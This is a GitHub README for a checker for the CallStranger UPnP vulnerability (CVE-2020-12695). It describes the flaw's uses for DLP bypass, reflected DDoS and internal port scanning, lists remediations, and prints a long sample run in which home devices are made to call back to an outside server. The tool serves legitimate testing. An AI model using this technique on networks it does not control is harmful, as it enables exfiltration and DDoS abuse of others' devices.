GitHub - yunuscadirci/CallStranger: Vulnerability checker for Callstranger (CVE-2020-12695)

CallStranger

This script created by Yunus Çadırcı (https://twitter.com/yunuscadirci) to check against CallStranger (CVE-2020-12695) vulnerability. An attacker can use this vulnerability for:

Bypassing DLP for exfiltrating data
Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood
Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration. You can find detailed information on https://www.callstranger.com https://kb.cert.org/vuls/id/339275 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695 Slightly modified version of https://github.com/5kyc0d3r/upnpy used for base UPnP communication

CallStranger Vulnerability

The CallStranger vulnerability that is found in billions of UPNP devices can be used to exfiltrate data (even if you have proper DLP/border security means) or scan your network or even cause your network to participate in a DDoS attack.
The vulnerability – CallStranger – is caused by Callback header value in UPnP SUBSCRIBE function can be controlled by an attacker and enables an SSRF-like vulnerability which affects millions of Internet facing and billions of LAN devices. This vulnerability can used for

Bypassing DLP and network security devices to exfiltrate data
Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS (not same with https://www.cloudflare.com/learning/ddos/ssdp-ddos-attack/ )
Scanning internal ports from Internet facing UPnP devices Possible remediations:
Disable unnecessary UPnP services especially for Internet facing devices/interfaces.
Check Intranet and server networks to be sure UPnP devices (Routers, IP cameras, printers, media gateways etc.) are not allowing data exfiltration.
Make an assessment on network security logs if this vulnerability had been used any threat actor.
Contact to ISP/ DDoS protection vendor if their solutions can block traffic generated by UPnP SUBSCRIBE (HTTP NOTIFY) Because this is a protocol vulnerability, it may take a long time for vendors to provide patches. Visit https://callstranger.com and https://kb.cert.org/vuls/id/339275 for detailed information, affected devices, software, and to follow updates. CVE-2020-12695 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695 is assigned to CallStranger. OCF updated UPnP specification on 17.04.2020 to remediate this vulnerability. Check new specification on https://openconnectivity.org/upnp-specs/UPnP-arch-DeviceArchitecture-v2.0-20200417.pdf

Install

sudo python3 setup.py install

if needed

sudo pip3 install -r requirements.txt

cryptography requests termcolor

Usage

just navigate to CallStranger and run with Python3 (Tested Python 3.7.5 on Windows 10, Python 3.8.2 on Kali 2020.2) For current subnet scan & test:

python3 CallStranger.py

For single device test:

python3 CallDirect.py http://DeviceDocumentPath

example: python3 CallDirect.py http://192.168.1.1:37215/upnpdev.xml

How script works?

Finds all UPnP devices on LAN
Finds all UPnP services
Finds all subscription endpoints
Sends these endpoints as encryted to verification server via UPnP Callback.
Server can't see this endpoints because all encryption is done on client side
Gets encrypted service list from verification server and decrypts on client side
Compares found UPnP services with verified ones

Example Output

_________        .__  .__    _________ __
\_   ___ \_____  |  | |  |  /   _____//  |_____________    ____    ____   ___________
/    \  \/\__  \ |  | |  |  \_____  \   __\_  __ \__  \  /    \  / ___\_/ __ \_  __ \
\     \____/ __ \|  |_|  |__/        \|  |  |  | \// __ \|   |  \/ /_/  >  ___/|  | \/
 \______  (____  /____/____/_______  /|__|  |__|  (____  /___|  /\___  / \___  >__|
        \/     \/                  \/                  \/     \//_____/      \/
This script created by Yunus Çadırcı (https://twitter.com/yunuscadirci) to check against CallStranger (CVE-2020-12695) vulnerability. An attacker can use this vulnerability for:
* Bypassing DLP for exfiltrating data
* Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood
* Scanning internal ports from Internet facing UPnP devices
You can find detailed information on https://www.callstranger.com  https://kb.cert.org/vuls/id/339275 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695
Slightly modified version of https://github.com/5kyc0d3r/upnpy used for base UPnP communication
Stranger Host: http://20.42.105.45
Stranger Port: 80
!Error in service definition http://192.168.1.24:2869 urn:dial-multiscreen-org:service:dial:1
10  devices found:

 Huawei Home Gateway http://192.168.1.1:37215 ( http://192.168.1.1:37215/upnpdev.xml )

  5 service(s) found for Huawei Home Gateway
     urn:schemas-upnp-org:service:Layer3Forwarding:1    --> http://192.168.1.1:37215/evt/Layer3Forwarding_1
     urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1    --> http://192.168.1.1:37215/evt/WANCommonInterfaceConfig_1
     urn:schemas-upnp-org:service:WANPPPConnection:1    --> http://192.168.1.1:37215/evt/WANPPPConnection_1
     urn:schemas-upnp-org:service:WANEthernetLinkConfig:1       --> http://192.168.1.1:37215/evt/WANEthernetLinkConfig_1
     urn:schemas-upnp-org:service:LANHostConfigManagement:1     --> http://192.168.1.1:37215/evt/LANHostConfigManagement_1

 OturmaTV http://192.168.1.22:2870 ( http://192.168.1.22:2870/dmr.xml )

  3 service(s) found for OturmaTV
     urn:schemas-upnp-org:service:RenderingControl:3    --> http://192.168.1.22:2870/event/RenderingControl
     urn:schemas-upnp-org:service:ConnectionManager:3   --> http://192.168.1.22:2870/event/ConnectionManager
     urn:schemas-upnp-org:service:AVTransport:3         --> http://192.168.1.22:2870/event/AVTransport

 ChromecastOturma4k http://192.168.1.21:8008 ( http://192.168.1.21:8008/ssdp/device-desc.xml )

  1 service(s) found for ChromecastOturma4k
     urn:dial-multiscreen-org:service:dial:1    --> http://192.168.1.21:8008/ssdp/notfound
     --skipping  http://192.168.1.21:8008/ssdp/notfound because it contains dummy service keywords

 VESTEL TV http://192.168.1.40:2870 ( http://192.168.1.40:2870/dmr.xml )

  3 service(s) found for VESTEL TV
     urn:schemas-upnp-org:service:RenderingControl:1    --> http://192.168.1.40:2870/RenderingControl/event
     urn:schemas-upnp-org:service:ConnectionManager:1   --> http://192.168.1.40:2870/ConnectionManager/event
     urn:schemas-upnp-org:service:AVTransport:1         --> http://192.168.1.40:2870/AVTransport/event

 MutfakChromecast http://192.168.1.36:8008 ( http://192.168.1.36:8008/ssdp/device-desc.xml )

  1 service(s) found for MutfakChromecast
     urn:dial-multiscreen-org:service:dial:1    --> http://192.168.1.36:8008/ssdp/notfound
     --skipping  http://192.168.1.36:8008/ssdp/notfound because it contains dummy service keywords

 VESTEL TV http://192.168.1.40:2870 ( http://192.168.1.40:2870/dmr.xml )

  3 service(s) found for VESTEL TV
     urn:schemas-upnp-org:service:RenderingControl:1    --> http://192.168.1.40:2870/RenderingControl/event
     urn:schemas-upnp-org:service:ConnectionManager:1   --> http://192.168.1.40:2870/ConnectionManager/event
     urn:schemas-upnp-org:service:AVTransport:1         --> http://192.168.1.40:2870/AVTransport/event

 DESKTOP-AEE3E5V http://192.168.1.31:2869 ( http://192.168.1.31:2869/upnphost/udhisapi.dll?content=uuid:7ea9d240-fbe4-4ad8-8001-5074901c3695 )

  1 service(s) found for DESKTOP-AEE3E5V
     urn:schemas-upnp-org:service:RenderingControl:1    --> http://192.168.1.31:2869/upnphost/udhisapi.dll?event=uuid:7ea9d240-fbe4-4ad8-8001-5074901c3695+urn:upnp-org:serviceId:RenderingControl

 OturmaTV http://192.168.1.22:49154 ( http://192.168.1.22:49154/nmsDescription.xml )

  2 service(s) found for OturmaTV
     urn:schemas-upnp-org:service:ContentDirectory:3    --> http://192.168.1.22:49154/upnp/event/ContentDirectoryNmsO
     urn:schemas-upnp-org:service:ConnectionManager:2   --> http://192.168.1.22:49154/upnp/event/ConnectionManagerNmsO

 XboxOne http://192.168.1.24:2869 ( http://192.168.1.24:2869/upnphost/udhisapi.dll?content=uuid:e69c8b0b-8a9d-4811-839e-c94650077ee0 )

  0 service(s) found for XboxOne

 XboxOne http://192.168.1.24:2869 ( http://192.168.1.24:2869/upnphost/udhisapi.dll?content=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c )

  3 service(s) found for XboxOne
     urn:schemas-upnp-org:service:RenderingControl:1    --> http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:RenderingControl
     urn:schemas-upnp-org:service:AVTransport:1         --> http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:AVTransport
     urn:schemas-upnp-org:service:ConnectionManager:1   --> http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:ConnectionManager

 Total 20 service(s) found. do you want to continue to VERIFY if service(s) are vulnerable?
Be careful: This operation needs Internet access and may transfer data about devices over network. Data encrypted on local and we cant see which services are vulnerable but ISPs and other elements may be able to inspect HTTP headers created by UPnP device. Because most of UPnPstack do not allow SSL connection we can not use it.
Do you want to continue? y/N y
Successfully get session:nae9lqq3keg79l3qei9ahohvqe
Symmetric random key for encryption: b'yy8e8uAg4kV-oSAuvdxrJBPwxMHx0JuEm1BsYXCzBYE='  We do not send this value to server so we can not see which services are vulnerable. All confirmation process is done on client side
Calling stranger for  http://192.168.1.1:37215/evt/Layer3Forwarding_1 with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNsB6Kv35geEsxbkkrAgED5So1wLhWURjcFwkyJ9h7w21BtUmbBmzAQ_YTgN-168MatiFy-skmKyTcleLkVKn5iv6xhEcY5DGiH_MJbeeZ77_AmgM_UF4dqqXsIdHJmROk&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.1:37215/evt/Layer3Forwarding_1 seems successfull
{'Server': 'ATP UPnP Core', 'TIMEOUT': 'Second-1800', 'SID': 'uuid:50898211-6467-9505-1115-309761531064', 'Date': 'Mon, 08 Jun 2020 07:15:22 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.1:37215/evt/WANCommonInterfaceConfig_1 with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWN7k769GzqT9VpIDZr2e93mpy8uz70lvmdxGSssRVWvn6Q8nGvA7nmKEVU4nWTA5c4eelJ7T2U8hGxvwVLlTl15LZ2_XH8boVyb45wS5oPB93CdwqUU0T1hHDDY5r4AFEjcmhHvYtx8RC_tAzm2eRk7w==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.1:37215/evt/WANCommonInterfaceConfig_1 seems successfull
{'Server': 'ATP UPnP Core', 'TIMEOUT': 'Second-1800', 'SID': 'uuid:07788594-5417-8052-8862-186260512738', 'Date': 'Mon, 08 Jun 2020 07:15:22 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.1:37215/evt/WANPPPConnection_1 with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWN5YhNQVAQagPd3LpBocI7jwkv8caPKiPAfeeD5X1uNSFZ7mfTWB3QwFcsVcbFln5JrVD3mlvHzD3UrYUC0VK_uRHd_c2K-m6h_Od2NUNB1dduNNMh7rMa0a2Wlq8WxxZn&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.1:37215/evt/WANPPPConnection_1 seems successfull
{'Server': 'ATP UPnP Core', 'TIMEOUT': 'Second-1800', 'SID': 'uuid:82456222-8470-4699-7387-649194725316', 'Date': 'Mon, 08 Jun 2020 07:15:22 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.1:37215/evt/WANEthernetLinkConfig_1 with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNRSj2ZczT5L4ZJvtQtwtyQaQmiYBdMAP96q-x1eCWLXAwGIIHMwZ6wvkPtlI0eAaYQHfOHqxrK2PvyYjKveFA9sbo4iyZ0vQKEyxStzRPCLQep4s0c0Lu53em19SP9T0S6FwCn8ISqe3RhloXMlA6nw==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.1:37215/evt/WANEthernetLinkConfig_1 seems successfull
{'Server': 'ATP UPnP Core', 'TIMEOUT': 'Second-1800', 'SID': 'uuid:97714486-6046-2730-7119-835081292303', 'Date': 'Mon, 08 Jun 2020 07:15:23 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.1:37215/evt/LANHostConfigManagement_1 with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNM3m3GW8-4btkYqaWTStBESHNmhQqZwEDd8jRONZyHcWwp8aQDkTpIk__0qv0m7vLuRdfCVt0P5n3oRcbnUXvUh3BPZ1ZwRfXtFyWr3PjKcIVbvkGj4EWD2pFKeiBEFDfZKRvR0pzFnqdxdiUuSRytQ==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.1:37215/evt/LANHostConfigManagement_1 failed with status code:501
{'Server': 'ATP UPnP Core', 'Date': 'Mon, 08 Jun 2020 07:15:23 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.22:2870/event/RenderingControl with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNny3BDg9OPz7WaHI8MiJpkALTuYhq7nY6l4raSduMcqumRKn4UlCXYs3sU9MgDhSi8-WtjR_X45asVQ3-r5fZ4ky6LR0WiG4BhqUTwmkf2615sCC3G4ZSfRGYq-G5qWVX&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.22:2870/event/RenderingControl seems successfull
{'DATE': 'Mon, 08 Jun 2020 07:15:24 GMT', 'SERVER': 'IPI/1.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:1387715a-035e-1090-b8e1-eef4918f5627', 'TIMEOUT': 'Second-300', 'CONTENT-LENGTH': '0', 'CONNECTION': 'Keep-Alive'}

Calling stranger for  http://192.168.1.22:2870/event/ConnectionManager with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNKQTdXOAlJaFdcir5kgI_v9PxZnpeWD-9IS6U2TqMM2aL1a4gg-JTL3CT5K8ZWAUBbEePDGqzqv7iiDzk41AMEiXILhED7lGiJ6wOO3LMSXNhamdQ37BLa8AoWmUuDGBxe-AEss0TC-QY8g7I67M68Q==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.22:2870/event/ConnectionManager seems successfull
{'DATE': 'Mon, 08 Jun 2020 07:15:24 GMT', 'SERVER': 'IPI/1.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:138b078e-035e-1090-a367-cb37c034dcad', 'TIMEOUT': 'Second-300', 'CONTENT-LENGTH': '0', 'CONNECTION': 'Keep-Alive'}

Calling stranger for  http://192.168.1.22:2870/event/AVTransport with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNw-5CaKWtBdFlWBV6PQtV4Q8koFEr9nKRbAOAm-_f035IQl9uUNY6MdrneLHLi_tBKJ37i5OOLiBsOYADTUpYtsFWApBe3NPCQgJDh5omi2mmClmPiVCPdjUNu7-TYmiK&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.22:2870/event/AVTransport seems successfull
{'DATE': 'Mon, 08 Jun 2020 07:15:24 GMT', 'SERVER': 'IPI/1.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:138da0f2-035e-1090-9f01-aca6dbf642e0', 'TIMEOUT': 'Second-300', 'CONTENT-LENGTH': '0', 'CONNECTION': 'Keep-Alive'}

Calling stranger for  http://192.168.1.40:2870/RenderingControl/event with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNtLC8GIuICPflEhBEu8nFgxe12U0nnrJ_ewbmVwlrtu0yEqC6rWp3CuUgYdHSYalFv8dG5ETCsQBnx6PVdHbSzk6EGpYBwo8nvdXqJtdnvnjeveUz9Q4bhwZ4qDKKmiQb&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.40:2870/RenderingControl/event seems successfull
{'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Server': 'NFLC/3.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:13e92d5a-035e-1090-8000-bc52a0dfdacc', 'Timeout': 'Second-300', 'Content-Length': '0', 'Connection': 'Keep-Alive'}

Calling stranger for  http://192.168.1.40:2870/ConnectionManager/event with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNJJsfohjZJRLZdiBF4Kvt1amVenr9a1Zi3oHhu_Xfomk_li6uJ9l0OeR6YVh2d6qbCF-t1uAmMVJfs5Tu7FWiNg15UXhyF8ubI_YZxtXTC4zpxHt7r2MdISJ8WwOFQ_J-f6E5yV6Bv8c4A1BBqfuD2Q==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.40:2870/ConnectionManager/event seems successfull
{'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Server': 'NFLC/3.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:13ec9fee-035e-1090-8000-bc52a0dfdacc', 'Timeout': 'Second-300', 'Content-Length': '0', 'Connection': 'Keep-Alive'}

Calling stranger for  http://192.168.1.40:2870/AVTransport/event with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWN0JCuymqONPp3Sbu9E_TUiUmXTZ5s777Hm2WsV7CO40kqjYGLoibSPew4uBpjel6Y_pOKPQOf3PsZwKG-PIC0G5jJiqEHmwRFI-Bd6ftBUIltwYGTtiBYII1QHfQ2c7mp&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.40:2870/AVTransport/event seems successfull
{'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Server': 'NFLC/3.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:13f07b14-035e-1090-8000-bc52a0dfdacc', 'Timeout': 'Second-300', 'Content-Length': '0', 'Connection': 'Keep-Alive'}

Calling stranger for  http://192.168.1.40:2870/RenderingControl/event with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNZwdAHuBpKwJw6L4vBT59oY3xnIU5iS85Gkmp8Ajo1p7gQx3FmvvyeWdNvX0vNhJ5ZDYLqJNp_Sct_F6xzJFlHSFe2nj4EvtiPL-GbHfBlHsthplZFfczbyXoqFxgwOlw&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.40:2870/RenderingControl/event seems successfull
{'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Server': 'NFLC/3.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:13f45a54-035e-1090-8000-bc52a0dfdacc', 'Timeout': 'Second-300', 'Content-Length': '0', 'Connection': 'Keep-Alive'}

Calling stranger for  http://192.168.1.40:2870/ConnectionManager/event with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNlKb5TTOnwnyQPA3au856DTuiCwyYdtGcCpSYHFNCBJ4j1Tr-1HbnLV59m9kHppA6GYRZpECoT-2s7MAwIpjvcllbbCdc0ORHoA40jDBwzdqECjLPCZnM1GncnOgfSFvfTYnbOMbnbYlY825Oi0f_ZA==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.40:2870/ConnectionManager/event seems successfull
{'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Server': 'NFLC/3.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:13f8483a-035e-1090-8000-bc52a0dfdacc', 'Timeout': 'Second-300', 'Content-Length': '0', 'Connection': 'Keep-Alive'}

Calling stranger for  http://192.168.1.40:2870/AVTransport/event with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNBpQ_jvIj1auFPntVMxiNgqCAMMLd4m960P-5nA87VRRR-cCDjUthjQ1BaiXYGw9lJ2QS6u6Iq1jl_ugpE8ef7hoeuK9oT33wDIjm9cST_xj4IYW_S2SddtSsHhIwtkMX&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.40:2870/AVTransport/event seems successfull
{'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Server': 'NFLC/3.0 UPnP/1.0 DLNADOC/1.50', 'SID': 'uuid:13fc0db2-035e-1090-8000-bc52a0dfdacc', 'Timeout': 'Second-300', 'Content-Length': '0', 'Connection': 'Keep-Alive'}

Calling stranger for  http://192.168.1.31:2869/upnphost/udhisapi.dll?event=uuid:7ea9d240-fbe4-4ad8-8001-5074901c3695+urn:upnp-org:serviceId:RenderingControl with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNk6hSWo8XmOpY-kvAsWA4ztVyP71dJy0Pit2GWl9lH5u7CiU8selzo2uSXmRczZYz2MMwbF45En3rkfmhk5JkRHRQOpytn1GhDClqevh-S6UBAiDiRvcnBFRhAyb-C6mjvOCbjpZ1amIaQs5wxPFH9OSCT6aeIp5BRPeCLbk0XsbExDvq7Kilmf0X-CeoJxwrOlzhEFt3aA9UbzrP5WKq_6KAVtxk_rDMemINYtBsjMwyAwSFIr2duohzAsL7pe-f&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.31:2869/upnphost/udhisapi.dll?event=uuid:7ea9d240-fbe4-4ad8-8001-5074901c3695+urn:upnp-org:serviceId:RenderingControl seems successfull
{'Server': 'Microsoft-Windows/10.0 UPnP/1.0 UPnP-Device-Host/1.0 Microsoft-HTTPAPI/2.0', 'Timeout': 'Second-300', 'SID': 'uuid:73096487-e9ce-4781-93bf-b5529b4120e9', 'Date': 'Mon, 08 Jun 2020 07:15:23 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.22:49154/upnp/event/ContentDirectoryNmsO with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNA1hU2ZXgFrbgMOrf3NfpHkNgShYE8oH0Zr1D8j1NHPWqCe7bEs_7g2TnvFmeoOE7hCLuzKVxdmviS-WjlvHLMlKzpJ9Yp4GxsPzviV8JD-Gnfj4yrt-SXcJe2c7Hb88BKxBqH5yRxSRZRSr6t7Ehjg==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.22:49154/upnp/event/ContentDirectoryNmsO seems successfull
{'DATE': 'Mon, 08 Jun 2020 07:15:24 GMT', 'SERVER': 'Linux2.6/0.0 UPnP/1.0 PhilipsIntelSDK/1.4 DLNADOC/1.50', 'SID': 'uuid:C0A80120-0000-0000-0ECC-000000000013', 'TIMEOUT': 'Second-300', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.22:49154/upnp/event/ConnectionManagerNmsO with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNaIGyRbT5EdecQpW24gV91ivFeWp9wbRY1iDwwv97ffOeptG7yMGm_XUTfxnSgORfXKCvwCLnfqgyh-F5uwoUVO3edotw_WgJ600TBDPVojsj2XYdPiaDEUN29S6TYk-BO4AqCTq6SyZ6bo-DqjcjYw==&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.22:49154/upnp/event/ConnectionManagerNmsO seems successfull
{'DATE': 'Mon, 08 Jun 2020 07:15:24 GMT', 'SERVER': 'Linux2.6/0.0 UPnP/1.0 PhilipsIntelSDK/1.4 DLNADOC/1.50', 'SID': 'uuid:C0A80120-0000-0000-0ECC-000000000014', 'TIMEOUT': 'Second-300', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:RenderingControl with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNXMZtJ2FXZUd6l9fPF4W6zyJ-jSIV7-YnsOAuS_3P8Qg_J59XfUp5l5SFUFzL5d_SyCFtTENW2sMrQZjGt5ZGZBMjmZfnNjNfmwpJwN9ZjKK_NCy4NRV69ipJG3E5evaeEbg4cOh2iwM_eCMyMdPzYD4MNBKaDFHG3QTUpPItjGdX169O3A77VaLH61OV0QSFmUcYro7yYCGRrj1B3G6Gl9vHPXUxfVZN5GqhgW2sHvZmTZUs7UKLVgzoEaS2Oy6h&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:RenderingControl seems successfull
{'Server': 'Microsoft-Windows/10.0 UPnP/1.0 UPnP-Device-Host/1.0 Microsoft-HTTPAPI/2.0', 'Timeout': 'Second-300', 'SID': 'uuid:2c36537d-018d-4ea9-ae60-83063198d187', 'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:AVTransport with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNdiaamddL1mXEEsXlJQRwPTTyy1vsWMFfYS02X8or9Rk8oS_nQPzDJzDYhn2UrwRgdW1evZRz-lYAmFqZnyb6R6JH0kFpd5Ds36KpFssmKRwTUBaRv3LjYl5SDt7r4Q1TCeGuKRHAPOQ3nKv5xovNNtNz38k-escgkwW9oRBPQAFnLZxQPwh3eb8bfLUl_1nxwZsdPKfB8Fp_wOjNezjXql9ljwtkzMy2Rzas9D9T9AoydyV_I60qyjJVNHy4As6T&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:AVTransport seems successfull
{'Server': 'Microsoft-Windows/10.0 UPnP/1.0 UPnP-Device-Host/1.0 Microsoft-HTTPAPI/2.0', 'Timeout': 'Second-300', 'SID': 'uuid:ad2d70f1-39c9-4a6c-83f8-a435ba8dbe51', 'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Content-Length': '0'}

Calling stranger for  http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:ConnectionManager with http://20.42.105.45:80/CallStranger.php?c=addservice&service=gAAAAABe3eWNSafCBN8pkwe2BMPrzwV1SzOUWciHVwYbPyTt1tut-PEkaQ2oDjS0yz0hd0t02pD35_DIkHhV_XRaGq5KMMdo6nnJ5sFjvhQ0uAilJF-4doO7DdWww7YNyZdo4258jmLQ2YRLSXodwQJXUlvVJN3pJIe4e9m9MjCbT214I61Ue14euKxx470mSpvpZCnVeQYnnUoS8SKkXibFVmJ-qpW4Ep3x8Xbb34GnSXe01OJpvf39uYZGsuKz0paeVgJTbnLl&token=nae9lqq3keg79l3qei9ahohvqe
Subscribe to http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:ConnectionManager seems successfull
{'Server': 'Microsoft-Windows/10.0 UPnP/1.0 UPnP-Device-Host/1.0 Microsoft-HTTPAPI/2.0', 'Timeout': 'Second-300', 'SID': 'uuid:51865133-d912-4c0c-9447-9615ef57f2e2', 'Date': 'Mon, 08 Jun 2020 07:15:24 GMT', 'Content-Length': '0'}


        Waiting 5 second for asynchronous request
Successfully get services from server: http://20.42.105.45:80/CallStranger.php?c=getservices&token=nae9lqq3keg79l3qei9ahohvqe

Encrypted vulnerable services:
gAAAAABe3eWNny3BDg9OPz7WaHI8MiJpkALTuYhq7nY6l4raSduMcqumRKn4UlCXYs3sU9MgDhSi8-WtjR_X45asVQ3-r5fZ4ky6LR0WiG4BhqUTwmkf2615sCC3G4ZSfRGYq-G5qWVX
gAAAAABe3eWNKQTdXOAlJaFdcir5kgI_v9PxZnpeWD-9IS6U2TqMM2aL1a4gg-JTL3CT5K8ZWAUBbEePDGqzqv7iiDzk41AMEiXILhED7lGiJ6wOO3LMSXNhamdQ37BLa8AoWmUuDGBxe-AEss0TC-QY8g7I67M68Q==
gAAAAABe3eWNw-5CaKWtBdFlWBV6PQtV4Q8koFEr9nKRbAOAm-_f035IQl9uUNY6MdrneLHLi_tBKJ37i5OOLiBsOYADTUpYtsFWApBe3NPCQgJDh5omi2mmClmPiVCPdjUNu7-TYmiK
gAAAAABe3eWNtLC8GIuICPflEhBEu8nFgxe12U0nnrJ_ewbmVwlrtu0yEqC6rWp3CuUgYdHSYalFv8dG5ETCsQBnx6PVdHbSzk6EGpYBwo8nvdXqJtdnvnjeveUz9Q4bhwZ4qDKKmiQb
gAAAAABe3eWNJJsfohjZJRLZdiBF4Kvt1amVenr9a1Zi3oHhu_Xfomk_li6uJ9l0OeR6YVh2d6qbCF-t1uAmMVJfs5Tu7FWiNg15UXhyF8ubI_YZxtXTC4zpxHt7r2MdISJ8WwOFQ_J-f6E5yV6Bv8c4A1BBqfuD2Q==
gAAAAABe3eWN0JCuymqONPp3Sbu9E_TUiUmXTZ5s777Hm2WsV7CO40kqjYGLoibSPew4uBpjel6Y_pOKPQOf3PsZwKG-PIC0G5jJiqEHmwRFI-Bd6ftBUIltwYGTtiBYII1QHfQ2c7mp
gAAAAABe3eWNsB6Kv35geEsxbkkrAgED5So1wLhWURjcFwkyJ9h7w21BtUmbBmzAQ_YTgN-168MatiFy-skmKyTcleLkVKn5iv6xhEcY5DGiH_MJbeeZ77_AmgM_UF4dqqXsIdHJmROk
gAAAAABe3eWNZwdAHuBpKwJw6L4vBT59oY3xnIU5iS85Gkmp8Ajo1p7gQx3FmvvyeWdNvX0vNhJ5ZDYLqJNp_Sct_F6xzJFlHSFe2nj4EvtiPL-GbHfBlHsthplZFfczbyXoqFxgwOlw
gAAAAABe3eWNlKb5TTOnwnyQPA3au856DTuiCwyYdtGcCpSYHFNCBJ4j1Tr-1HbnLV59m9kHppA6GYRZpECoT-2s7MAwIpjvcllbbCdc0ORHoA40jDBwzdqECjLPCZnM1GncnOgfSFvfTYnbOMbnbYlY825Oi0f_ZA==
